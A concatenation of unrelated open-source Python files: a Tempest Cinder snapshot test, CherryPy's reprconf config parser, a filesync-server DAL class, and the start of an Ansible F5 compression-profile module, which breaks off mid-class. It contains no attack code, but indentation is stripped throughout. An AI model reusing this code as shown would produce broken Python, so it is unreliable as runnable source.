def get_subscr_ext_url(self, subscr):
if not subscr.backend_extid:
return None
return 'https://dashboard.stripe.com/customers/%s' % subscr.backend_extid
| mit |
Vaidyanath/tempest | tempest/api/volume/test_volumes_snapshots.py | 1 | 8416 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.volume import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.openstack.common import log as logging
from tempest import test
LOG = logging.getLogger(__name__)
CONF = config.CONF
class VolumesV2SnapshotTestJSON(base.BaseVolumeTest):
@classmethod
def skip_checks(cls):
super(VolumesV2SnapshotTestJSON, cls).skip_checks()
if not CONF.volume_feature_enabled.snapshot:
raise cls.skipException("Cinder volume snapshots are disabled")
@classmethod
def resource_setup(cls):
super(VolumesV2SnapshotTestJSON, cls).resource_setup()
cls.volume_origin = cls.create_volume()
cls.name_field = cls.special_fields['name_field']
cls.descrip_field = cls.special_fields['descrip_field']
def _detach(self, volume_id):
"""Detach volume."""
self.volumes_client.detach_volume(volume_id)
self.volumes_client.wait_for_volume_status(volume_id, 'available')
def _list_by_param_values_and_assert(self, params, with_detail=False):
"""
Perform list or list_details action with given params
and validates result.
"""
if with_detail:
fetched_snap_list = \
self.snapshots_client.\
list_snapshots_with_detail(params=params)
else:
fetched_snap_list = \
self.snapshots_client.list_snapshots(params=params)
# Validating params of fetched snapshots
for snap in fetched_snap_list:
for key in params:
msg = "Failed to list snapshots %s by %s" % \
('details' if with_detail else '', key)
self.assertEqual(params[key], snap[key], msg)
@test.attr(type='gate')
@test.services('compute')
def test_snapshot_create_with_volume_in_use(self):
# Create a snapshot when volume status is in-use
# Create a test instance
server_name = data_utils.rand_name('instance-')
server = self.servers_client.create_server(server_name,
self.image_ref,
self.flavor_ref)
self.addCleanup(self.servers_client.delete_server, server['id'])
self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')
mountpoint = '/dev/%s' % CONF.compute.volume_device_name
self.servers_client.attach_volume(
server['id'], self.volume_origin['id'], mountpoint)
self.volumes_client.wait_for_volume_status(self.volume_origin['id'],
'in-use')
self.addCleanup(self.volumes_client.wait_for_volume_status,
self.volume_origin['id'], 'available')
self.addCleanup(self.servers_client.detach_volume, server['id'],
self.volume_origin['id'])
# Snapshot a volume even if it's attached to an instance
snapshot = self.create_snapshot(self.volume_origin['id'],
force=True)
# Delete the snapshot
self.snapshots_client.delete_snapshot(snapshot['id'])
self.snapshots_client.wait_for_resource_deletion(snapshot['id'])
self.snapshots.remove(snapshot)
@test.attr(type='gate')
def test_snapshot_create_get_list_update_delete(self):
# Create a snapshot
s_name = data_utils.rand_name('snap')
params = {self.name_field: s_name}
snapshot = self.create_snapshot(self.volume_origin['id'], **params)
# Get the snap and check for some of its details
snap_get = self.snapshots_client.get_snapshot(snapshot['id'])
self.assertEqual(self.volume_origin['id'],
snap_get['volume_id'],
"Referred volume origin mismatch")
# Compare also with the output from the list action
tracking_data = (snapshot['id'], snapshot[self.name_field])
snaps_list = self.snapshots_client.list_snapshots()
snaps_data = [(f['id'], f[self.name_field]) for f in snaps_list]
self.assertIn(tracking_data, snaps_data)
# Updates snapshot with new values
new_s_name = data_utils.rand_name('new-snap')
new_desc = 'This is the new description of snapshot.'
params = {self.name_field: new_s_name,
self.descrip_field: new_desc}
update_snapshot = \
self.snapshots_client.update_snapshot(snapshot['id'], **params)
# Assert response body for update_snapshot method
self.assertEqual(new_s_name, update_snapshot[self.name_field])
self.assertEqual(new_desc, update_snapshot[self.descrip_field])
# Assert response body for get_snapshot method
updated_snapshot = \
self.snapshots_client.get_snapshot(snapshot['id'])
self.assertEqual(new_s_name, updated_snapshot[self.name_field])
self.assertEqual(new_desc, updated_snapshot[self.descrip_field])
# Delete the snapshot
self.snapshots_client.delete_snapshot(snapshot['id'])
self.snapshots_client.wait_for_resource_deletion(snapshot['id'])
self.snapshots.remove(snapshot)
@test.attr(type='gate')
def test_snapshots_list_with_params(self):
"""list snapshots with params."""
# Create a snapshot
display_name = data_utils.rand_name('snap')
params = {self.name_field: display_name}
snapshot = self.create_snapshot(self.volume_origin['id'], **params)
# Verify list snapshots by display_name filter
params = {self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params)
# Verify list snapshots by status filter
params = {'status': 'available'}
self._list_by_param_values_and_assert(params)
# Verify list snapshots by status and display name filter
params = {'status': 'available',
self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params)
@test.attr(type='gate')
def test_snapshots_list_details_with_params(self):
"""list snapshot details with params."""
# Create a snapshot
display_name = data_utils.rand_name('snap')
params = {self.name_field: display_name}
snapshot = self.create_snapshot(self.volume_origin['id'], **params)
# Verify list snapshot details by display_name filter
params = {self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params, with_detail=True)
# Verify list snapshot details by status filter
params = {'status': 'available'}
self._list_by_param_values_and_assert(params, with_detail=True)
# Verify list snapshot details by status and display name filter
params = {'status': 'available',
self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params, with_detail=True)
@test.attr(type='gate')
def test_volume_from_snapshot(self):
# Create a temporary snap using wrapper method from base, then
# create a snap based volume and deletes it
snapshot = self.create_snapshot(self.volume_origin['id'])
# NOTE(gfidente): size is required also when passing snapshot_id
volume = self.volumes_client.create_volume(
size=1,
snapshot_id=snapshot['id'])
self.volumes_client.wait_for_volume_status(volume['id'], 'available')
self.volumes_client.delete_volume(volume['id'])
self.volumes_client.wait_for_resource_deletion(volume['id'])
self.clear_snapshots()
class VolumesV1SnapshotTestJSON(VolumesV2SnapshotTestJSON):
_api_version = 1
| apache-2.0 |
rembo10/headphones | lib/cherrypy/lib/reprconf.py | 53 | 14704 | """Generic configuration system using unrepr.
Configuration data may be supplied as a Python dictionary, as a filename,
or as an open file object. When you supply a filename or file, Python's
builtin ConfigParser is used (with some extensions).
Namespaces
----------
Configuration keys are separated into namespaces by the first "." in the key.
The only key that cannot exist in a namespace is the "environment" entry.
This special entry 'imports' other config entries from a template stored in
the Config.environments dict.
You can define your own namespaces to be called when new config is merged
by adding a named handler to Config.namespaces. The name can be any string,
and the handler must be either a callable or a context manager.
"""
try:
# Python 3.0+
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
try:
set
except NameError:
from sets import Set as set
try:
basestring
except NameError:
basestring = str
try:
# Python 3
import builtins
except ImportError:
# Python 2
import __builtin__ as builtins
import operator as _operator
import sys
def as_dict(config):
"""Return a dict from 'config' whether it is a dict, file, or filename."""
if isinstance(config, basestring):
config = Parser().dict_from_file(config)
elif hasattr(config, 'read'):
config = Parser().dict_from_file(config)
return config
class NamespaceSet(dict):
"""A dict of config namespace names and handlers.
Each config entry should begin with a namespace name; the corresponding
namespace handler will be called once for each config entry in that
namespace, and will be passed two arguments: the config key (with the
namespace removed) and the config value.
Namespace handlers may be any Python callable; they may also be
Python 2.5-style 'context managers', in which case their __enter__
method should return a callable to be used as the handler.
See cherrypy.tools (the Toolbox class) for an example.
"""
def __call__(self, config):
"""Iterate through config and pass it to each namespace handler.
config
A flat dict, where keys use dots to separate
namespaces, and values are arbitrary.
The first name in each config key is used to look up the corresponding
namespace handler. For example, a config entry of {'tools.gzip.on': v}
will call the 'tools' namespace handler with the args: ('gzip.on', v)
"""
# Separate the given config into namespaces
ns_confs = {}
for k in config:
if "." in k:
ns, name = k.split(".", 1)
bucket = ns_confs.setdefault(ns, {})
bucket[name] = config[k]
# I chose __enter__ and __exit__ so someday this could be
# rewritten using Python 2.5's 'with' statement:
# for ns, handler in self.iteritems():
# with handler as callable:
# for k, v in ns_confs.get(ns, {}).iteritems():
# callable(k, v)
for ns, handler in self.items():
exit = getattr(handler, "__exit__", None)
if exit:
callable = handler.__enter__()
no_exc = True
try:
try:
for k, v in ns_confs.get(ns, {}).items():
callable(k, v)
except:
# The exceptional case is handled here
no_exc = False
if exit is None:
raise
if not exit(*sys.exc_info()):
raise
# The exception is swallowed if exit() returns true
finally:
# The normal and non-local-goto cases are handled here
if no_exc and exit:
exit(None, None, None)
else:
for k, v in ns_confs.get(ns, {}).items():
handler(k, v)
def __repr__(self):
return "%s.%s(%s)" % (self.__module__, self.__class__.__name__,
dict.__repr__(self))
def __copy__(self):
newobj = self.__class__()
newobj.update(self)
return newobj
copy = __copy__
class Config(dict):
"""A dict-like set of configuration data, with defaults and namespaces.
May take a file, filename, or dict.
"""
defaults = {}
environments = {}
namespaces = NamespaceSet()
def __init__(self, file=None, **kwargs):
self.reset()
if file is not None:
self.update(file)
if kwargs:
self.update(kwargs)
def reset(self):
"""Reset self to default values."""
self.clear()
dict.update(self, self.defaults)
def update(self, config):
"""Update self from a dict, file or filename."""
if isinstance(config, basestring):
# Filename
config = Parser().dict_from_file(config)
elif hasattr(config, 'read'):
# Open file object
config = Parser().dict_from_file(config)
else:
config = config.copy()
self._apply(config)
def _apply(self, config):
"""Update self from a dict."""
which_env = config.get('environment')
if which_env:
env = self.environments[which_env]
for k in env:
if k not in config:
config[k] = env[k]
dict.update(self, config)
self.namespaces(config)
def __setitem__(self, k, v):
dict.__setitem__(self, k, v)
self.namespaces({k: v})
class Parser(ConfigParser):
"""Sub-class of ConfigParser that keeps the case of options and that
raises an exception if the file cannot be read.
"""
def optionxform(self, optionstr):
return optionstr
def read(self, filenames):
if isinstance(filenames, basestring):
filenames = [filenames]
for filename in filenames:
# try:
# fp = open(filename)
# except IOError:
# continue
fp = open(filename)
try:
self._read(fp, filename)
finally:
fp.close()
def as_dict(self, raw=False, vars=None):
"""Convert an INI file to a dictionary"""
# Load INI file into a dict
result = {}
for section in self.sections():
if section not in result:
result[section] = {}
for option in self.options(section):
value = self.get(section, option, raw=raw, vars=vars)
try:
value = unrepr(value)
except Exception:
x = sys.exc_info()[1]
msg = ("Config error in section: %r, option: %r, "
"value: %r. Config values must be valid Python." %
(section, option, value))
raise ValueError(msg, x.__class__.__name__, x.args)
result[section][option] = value
return result
def dict_from_file(self, file):
if hasattr(file, 'read'):
self.readfp(file)
else:
self.read(file)
return self.as_dict()
# public domain "unrepr" implementation, found on the web and then improved.
class _Builder2:
def build(self, o):
m = getattr(self, 'build_' + o.__class__.__name__, None)
if m is None:
raise TypeError("unrepr does not recognize %s" %
repr(o.__class__.__name__))
return m(o)
def astnode(self, s):
"""Return a Python2 ast Node compiled from a string."""
try:
import compiler
except ImportError:
# Fallback to eval when compiler package is not available,
# e.g. IronPython 1.0.
return eval(s)
p = compiler.parse("__tempvalue__ = " + s)
return p.getChildren()[1].getChildren()[0].getChildren()[1]
def build_Subscript(self, o):
expr, flags, subs = o.getChildren()
expr = self.build(expr)
subs = self.build(subs)
return expr[subs]
def build_CallFunc(self, o):
children = o.getChildren()
# Build callee from first child
callee = self.build(children[0])
# Build args and kwargs from remaining children
args = []
kwargs = {}
for child in children[1:]:
class_name = child.__class__.__name__
# None is ignored
if class_name == 'NoneType':
continue
# Keywords become kwargs
if class_name == 'Keyword':
kwargs.update(self.build(child))
# Everything else becomes args
else :
args.append(self.build(child))
return callee(*args, **kwargs)
def build_Keyword(self, o):
key, value_obj = o.getChildren()
value = self.build(value_obj)
kw_dict = {key: value}
return kw_dict
def build_List(self, o):
return map(self.build, o.getChildren())
def build_Const(self, o):
return o.value
def build_Dict(self, o):
d = {}
i = iter(map(self.build, o.getChildren()))
for el in i:
d[el] = i.next()
return d
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
name = o.name
if name == 'None':
return None
if name == 'True':
return True
if name == 'False':
return False
# See if the Name is a package or module. If it is, import it.
try:
return modules(name)
except ImportError:
pass
# See if the Name is in builtins.
try:
return getattr(builtins, name)
except AttributeError:
pass
raise TypeError("unrepr could not resolve the name %s" % repr(name))
def build_Add(self, o):
left, right = map(self.build, o.getChildren())
return left + right
def build_Mul(self, o):
left, right = map(self.build, o.getChildren())
return left * right
def build_Getattr(self, o):
parent = self.build(o.expr)
return getattr(parent, o.attrname)
def build_NoneType(self, o):
return None
def build_UnarySub(self, o):
return -self.build(o.getChildren()[0])
def build_UnaryAdd(self, o):
return self.build(o.getChildren()[0])
class _Builder3:
def build(self, o):
m = getattr(self, 'build_' + o.__class__.__name__, None)
if m is None:
raise TypeError("unrepr does not recognize %s" %
repr(o.__class__.__name__))
return m(o)
def astnode(self, s):
"""Return a Python3 ast Node compiled from a string."""
try:
import ast
except ImportError:
# Fallback to eval when ast package is not available,
# e.g. IronPython 1.0.
return eval(s)
p = ast.parse("__tempvalue__ = " + s)
return p.body[0].value
def build_Subscript(self, o):
return self.build(o.value)[self.build(o.slice)]
def build_Index(self, o):
return self.build(o.value)
def build_Call(self, o):
callee = self.build(o.func)
if o.args is None:
args = ()
else:
args = tuple([self.build(a) for a in o.args])
if o.starargs is None:
starargs = ()
else:
starargs = self.build(o.starargs)
if o.kwargs is None:
kwargs = {}
else:
kwargs = self.build(o.kwargs)
return callee(*(args + starargs), **kwargs)
def build_List(self, o):
return list(map(self.build, o.elts))
def build_Str(self, o):
return o.s
def build_Num(self, o):
return o.n
def build_Dict(self, o):
return dict([(self.build(k), self.build(v))
for k, v in zip(o.keys, o.values)])
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
name = o.id
if name == 'None':
return None
if name == 'True':
return True
if name == 'False':
return False
# See if the Name is a package or module. If it is, import it.
try:
return modules(name)
except ImportError:
pass
# See if the Name is in builtins.
try:
import builtins
return getattr(builtins, name)
except AttributeError:
pass
raise TypeError("unrepr could not resolve the name %s" % repr(name))
def build_NameConstant(self, o):
return o.value
def build_UnaryOp(self, o):
op, operand = map(self.build, [o.op, o.operand])
return op(operand)
def build_BinOp(self, o):
left, op, right = map(self.build, [o.left, o.op, o.right])
return op(left, right)
def build_Add(self, o):
return _operator.add
def build_Mult(self, o):
return _operator.mul
def build_USub(self, o):
return _operator.neg
def build_Attribute(self, o):
parent = self.build(o.value)
return getattr(parent, o.attr)
def build_NoneType(self, o):
return None
def unrepr(s):
"""Return a Python object compiled from a string."""
if not s:
return s
if sys.version_info < (3, 0):
b = _Builder2()
else:
b = _Builder3()
obj = b.astnode(s)
return b.build(obj)
def modules(modulePath):
"""Load a module and retrieve a reference to that module."""
__import__(modulePath)
return sys.modules[modulePath]
def attributes(full_attribute_name):
"""Load a module and retrieve an attribute of that module."""
# Parse out the path, module, and attribute
last_dot = full_attribute_name.rfind(".")
attr_name = full_attribute_name[last_dot + 1:]
mod_path = full_attribute_name[:last_dot]
mod = modules(mod_path)
# Let an AttributeError propagate outward.
try:
attr = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
# Return a reference to the attribute.
return attr
| gpl-3.0 |
indradhanush/filesync-server | src/rpcdb/dal_backend.py | 6 | 16812 | # Copyright 2008-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further info, check http://launchpad.net/filesync-server
"""The DAL entry point as a service."""
import uuid
from backends.filesync.data import services, errors, model
class DAL(object):
"""The entry point for the DAL."""
def _get_user(self, user_id, session_id=None):
"""Return a storage user for the given id."""
return services.get_storage_user(user_id, session_id=session_id)
def ping(self):
"""Used for a simple liveness check."""
return dict(response="pong")
def unlink_node(self, user_id, volume_id, node_id, session_id=None):
"""Unlink a node."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).node(node_id).delete()
return dict(generation=node.generation, kind=node.kind,
name=node.name, mimetype=node.mimetype)
def list_volumes(self, user_id):
"""List all the volumes the user is involved.
This includes the real Root, the UDFs, and the shares that were shared
to the user already accepted.
"""
user = self._get_user(user_id)
# root info
root = user.volume().get_volume()
root_info = dict(root_id=root.root_id, generation=root.generation)
# quota
free_bytes = user.get_quota().free_bytes
# shares
shares = []
for share in user.get_shared_to(accepted=True):
suser = share.shared_by
resp = dict(id=share.id, root_id=share.root_id, name=share.name,
shared_by_username=suser.username,
shared_by_visible_name=suser.visible_name,
accepted=share.accepted, access=share.access)
info = services.get_user_info_for_shard(suser.id, suser.shard_id)
resp['free_bytes'] = info.free_bytes
resp['generation'] = share.get_generation()
shares.append(resp)
# udfs
udfs = []
for udf in user.get_udfs():
resp = dict(id=udf.id, root_id=udf.root_id, path=udf.path,
generation=udf.generation)
udfs.append(resp)
result = dict(root=root_info, free_bytes=free_bytes,
shares=shares, udfs=udfs)
return result
def move(self, user_id, volume_id, node_id,
new_parent_id, new_name, session_id=None):
"""Move a node and/or rename it."""
user = self._get_user(user_id, session_id)
# If we get new_parent_id as str/unicode, generate a UUID using it
# because StorageObject.move() expects it to be either a UUID or None.
if isinstance(new_parent_id, basestring):
new_parent_id = uuid.UUID(new_parent_id)
node = user.volume(volume_id).node(node_id).move(new_parent_id,
new_name)
return dict(generation=node.generation, mimetype=node.mimetype)
def make_dir(self, user_id, volume_id, parent_id, name, session_id=None):
"""Make a subdirectory."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).dir(parent_id).make_subdirectory(name)
return dict(generation=node.generation, node_id=node.id,
mimetype=node.mimetype)
def make_file(self, user_id, volume_id, parent_id, name, session_id=None):
"""Make a no-content file."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).dir(parent_id).make_file(name)
return dict(generation=node.generation, node_id=node.id,
mimetype=node.mimetype)
def make_file_with_content(self, user_id, volume_id, parent_id, name,
node_hash, crc32, size, deflated_size,
storage_key, session_id=None):
"""Make a file with associated content."""
user = self._get_user(user_id, session_id)
func = user.volume(volume_id).dir(parent_id).make_file_with_content
node = func(name, node_hash, crc32, size, deflated_size, storage_key)
return dict(generation=node.generation, node_id=node.id)
def create_share(self, user_id, node_id,
to_username, share_name, readonly):
"""Create a share."""
user = self._get_user(user_id)
to_user = services.get_storage_user(username=to_username)
share = user.volume().dir(node_id).share(to_user.id,
share_name, readonly)
return dict(share_id=share.id)
def delete_share(self, user_id, share_id):
"""Delete a share."""
user = self._get_user(user_id)
share = user.get_share(share_id)
share.delete()
return {}
def accept_share(self, user_id, share_id):
"""Accept a share."""
user = self._get_user(user_id)
share = user.get_share(share_id)
share.accept()
return {}
def decline_share(self, user_id, share_id):
"""Decline a share."""
user = self._get_user(user_id)
share = user.get_share(share_id)
share.decline()
return {}
def list_shares(self, user_id, accepted):
"""List all the shares the user is involved.
This includes the 'shared_by' (shares from the user to somebody else)
and the 'shared_to' (shares from somebody else to the user). In the
later, a filter is done regarding if the shares were accepted by the
user or not.
"""
user = self._get_user(user_id)
# shared_by
shared_by = []
for share in user.get_shared_by():
# get info from the shared_to user (if any)
other_user = share.shared_to
to_username = other_user.username if other_user else None
to_visible_name = other_user.visible_name if other_user else None
resp = dict(id=share.id, root_id=share.root_id, name=share.name,
shared_to_username=to_username,
shared_to_visible_name=to_visible_name,
accepted=share.accepted, access=share.access)
shared_by.append(resp)
# shared_to
shared_to = []
for share in user.get_shared_to(accepted=accepted):
# get info from the shared_to user (if any)
other_user = share.shared_by
by_username = other_user.username if other_user else None
by_visible_name = other_user.visible_name if other_user else None
resp = dict(id=share.id, root_id=share.root_id, name=share.name,
shared_by_username=by_username,
shared_by_visible_name=by_visible_name,
accepted=share.accepted, access=share.access)
shared_to.append(resp)
return dict(shared_by=shared_by, shared_to=shared_to)
def create_udf(self, user_id, path, session_id):
"""Create an UDF."""
user = self._get_user(user_id, session_id)
udf = user.make_udf(path)
return dict(udf_id=udf.id, udf_root_id=udf.root_id, udf_path=udf.path)
def delete_volume(self, user_id, volume_id, session_id):
"""Delete a volume, being it a share or an udf."""
user = self._get_user(user_id, session_id)
# we could ask permission instead of forgiveness here, but is
# cheaper this than to access database just to see if exists
try:
share = user.get_share(volume_id)
share.delete()
except errors.DoesNotExist:
# not a share, try it with a UDF
try:
user.delete_udf(volume_id)
except errors.DoesNotExist:
msg = "Volume %r does not exist" % (volume_id,)
raise errors.DoesNotExist(msg)
return {}
def get_user_quota(self, user_id):
"""Get the quota info for an user."""
user = self._get_user(user_id)
quota = user.get_quota()
d = dict(max_storage_bytes=quota.max_storage_bytes,
used_storage_bytes=quota.used_storage_bytes,
free_bytes=quota.free_bytes)
return d
def get_share(self, user_id, share_id):
"""Get the share information for a given id."""
user = self._get_user(user_id)
share = user.get_share(share_id)
d = dict(share_id=share.id, share_root_id=share.root_id,
name=share.name, shared_by_id=share.shared_by_id,
shared_to_id=share.shared_to_id, accepted=share.accepted,
access=share.access)
return d
def get_root(self, user_id):
"""Get the root id."""
user = self._get_user(user_id)
node = user.root.load()
return dict(root_id=node.id, generation=node.generation)
def get_volume_id(self, user_id, node_id):
"""Get the volume_id of a node.
Note that this method returns not the same parameter that is
returned in get_node (that is vol_id).
"""
user = self._get_user(user_id)
node = user.volume().get_node(node_id)
volume_id = node.volume_id
if volume_id == user.root_volume_id:
volume_id = None
return dict(volume_id=volume_id)
def get_node_from_user(self, user_id, node_id):
"""Get node info from its id and the user, no matter the volume.
Note that in this case the content for the node is not returned.
"""
user = self._get_user(user_id)
node = services.get_node_for_shard(node_id, user.shard_id)
return self._process_node(node)
def get_node(self, user_id, volume_id, node_id):
"""Get node info from its id, volume and user.
The node is returned with its content.
"""
user = self._get_user(user_id)
node = user.volume(volume_id).get_node(node_id, with_content=True)
return self._process_node(node)
def _process_node(self, node):
"""Get info from a node."""
is_live = node.status == model.STATUS_LIVE
is_file = node.kind == 'File'
content = node.content
if content is not None:
crc32 = content.crc32
size = content.size
deflated_size = content.deflated_size
storage_key = content.storage_key
has_content = True
else:
crc32 = None
size = None
deflated_size = None
storage_key = None
has_content = False
d = dict(id=node.id, name=node.name, generation=node.generation,
is_public=node.is_public, deflated_size=deflated_size,
last_modified=node.when_last_modified, crc32=crc32,
storage_key=storage_key, is_live=is_live,
size=size, is_file=is_file, volume_id=node.vol_id,
parent_id=node.parent_id, content_hash=node.content_hash,
path=node.path, has_content=has_content)
return d
def get_delta(self, user_id, volume_id, from_generation, limit):
"""Get a delta from a given generation."""
user = self._get_user(user_id)
get_delta = user.volume(volume_id).get_delta
vol_gen, free_bytes, delta = get_delta(from_generation, limit=limit)
nodes = [self._process_node(n) for n in delta]
return dict(vol_generation=vol_gen, free_bytes=free_bytes, nodes=nodes)
def get_from_scratch(self, user_id, volume_id, start_from_path=None,
limit=None, max_generation=None):
"""Get all nodes from scratch."""
user = self._get_user(user_id)
vol_gen, free_bytes, nodes = user.volume(volume_id).get_from_scratch(
start_from_path=start_from_path, limit=limit,
max_generation=max_generation)
nodes = [self._process_node(n) for n in nodes]
return dict(vol_generation=vol_gen, free_bytes=free_bytes, nodes=nodes)
def get_user_data(self, user_id, session_id):
"""Get data from the user."""
user = self._get_user(user_id, session_id)
return dict(root_volume_id=user.root_volume_id, username=user.username,
visible_name=user.visible_name)
def make_content(self, user_id, volume_id, node_id, original_hash,
hash_hint, crc32_hint, inflated_size_hint,
deflated_size_hint, storage_key, magic_hash, session_id):
"""Get node and make content for it."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).get_node(node_id)
node.make_content(original_hash, hash_hint, crc32_hint,
inflated_size_hint, deflated_size_hint,
storage_key, magic_hash)
return dict(generation=node.generation)
def _process_uploadjob(self, uj):
"""Get the info of an upload job to return as dict."""
d = dict(
uploadjob_id=uj.id,
uploaded_bytes=uj.uploaded_bytes,
multipart_id=uj.multipart_id,
multipart_key=uj.multipart_key,
chunk_count=uj.chunk_count,
hash_context=uj.hash_context,
magic_hash_context=uj.magic_hash_context,
decompress_context=uj.decompress_context,
inflated_size=uj.inflated_size,
crc32=uj.crc32,
when_last_active=uj.when_last_active,
)
return d
def get_uploadjob(self, user_id, volume_id, node_id, uploadjob_id,
hash_value, crc32, inflated_size,
deflated_size):
"""Make an upload job for a node."""
user = self._get_user(user_id)
node = user.volume(volume_id).get_node(node_id)
uj = node.get_multipart_uploadjob(uploadjob_id, hash_value, crc32,
inflated_size, deflated_size)
return self._process_uploadjob(uj)
def make_uploadjob(self, user_id, volume_id, node_id, previous_hash,
hash_value, crc32, inflated_size,
deflated_size, multipart_key):
"""Make an upload job for a node."""
user = self._get_user(user_id)
node = user.volume(volume_id).get_node(node_id)
uj = node.make_uploadjob(previous_hash, hash_value, crc32,
inflated_size, deflated_size,
multipart_key=multipart_key)
return self._process_uploadjob(uj)
def set_uploadjob_multipart_id(self, user_id, uploadjob_id, multipart_id):
"""Set the multipart id for an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.set_multipart_id(multipart_id)
return {}
def delete_uploadjob(self, user_id, uploadjob_id):
"""Delete an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.delete()
return {}
def add_part_to_uploadjob(self, user_id, uploadjob_id, chunk_size,
inflated_size, crc32, hash_context,
magic_hash_context, decompress_context):
"""Add a part to an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.add_part(chunk_size, inflated_size, crc32,
hash_context, magic_hash_context, decompress_context)
return {}
def touch_uploadjob(self, user_id, uploadjob_id):
"""Touch an upload job."""
user = self._get_user(user_id)
uj = user.get_uploadjob(uploadjob_id)
uj.touch()
return dict(when_last_active=uj.when_last_active)
def get_reusable_content(self, user_id, hash_value, magic_hash):
"""Return if the blob exists and its storage_key."""
user = self._get_user(user_id)
be, sk = user.is_reusable_content(hash_value, magic_hash)
return dict(blob_exists=be, storage_key=sk)
| agpl-3.0 |
mgit-at/ansible | lib/ansible/modules/network/f5/bigip_profile_http_compression.py | 3 | 16178 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_profile_http_compression
short_description: Manage HTTP compression profiles on a BIG-IP
description:
- Manage HTTP compression profiles on a BIG-IP.
version_added: 2.7
options:
name:
description:
- Specifies the name of the compression profile.
required: True
parent:
description:
- Specifies the profile from which this profile inherits settings.
- When creating a new profile, if this parameter is not specified, the default
is the system-supplied C(httpcompression) profile.
description:
description:
- Description of the HTTP compression profile.
buffer_size:
description:
- Maximum number of compressed bytes that the system buffers before inserting
a Content-Length header (which specifies the compressed size) into the response.
- When creating a new profile, if this parameter is not specified, the default
is provided by the parent profile.
gzip_level:
description:
- Specifies the degree to which the system compresses the content.
- Higher compression levels cause the compression process to be slower.
- Valid values are between 1 (least compression and fastest) to 9 (most
compression and slowest).
choices:
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
gzip_memory_level:
description:
- Number of kilobytes of memory that the system uses for internal compression
buffers when compressing a server response.
choices:
- 1
- 2
- 4
- 8
- 16
- 32
- 64
- 128
- 256
gzip_window_size:
description:
- Number of kilobytes in the window size that the system uses when compressing
a server response.
choices:
- 1
- 2
- 4
- 8
- 16
- 32
- 64
- 128
partition:
description:
- Device partition to manage resources on.
default: Common
state:
description:
- When C(present), ensures that the profile exists.
- When C(absent), ensures the profile is removed.
default: present
choices:
- present
- absent
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create an HTTP compression profile
bigip_profile_http_compression:
name: profile1
description: Custom HTTP Compression Profile
buffer_size: 131072
gzip_level: 6
gzip_memory_level: 16k
gzip_window_size: 64k
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The new description of the resource.
returned: changed
type: string
sample: My custom profile
buffer_size:
description: The new buffer size of the profile.
returned: changed
type: int
sample: 4096
gzip_memory_level:
description: The new GZIP memory level, in KB, of the profile.
returned: changed
type: int
sample: 16
gzip_level:
description: The new GZIP level of the profile. Smaller is less compression.
returned: changed
type: int
sample: 2
gzip_window_size:
description: The new GZIP window size, in KB, of the profile.
returned: changed
type: int
sample: 64
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import transform_name
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import transform_name
class Parameters(AnsibleF5Parameters):
api_map = {
'bufferSize': 'buffer_size',
'defaultsFrom': 'parent',
'gzipMemoryLevel': 'gzip_memory_level',
'gzipLevel': 'gzip_level',
'gzipWindowSize': 'gzip_window_size',
}
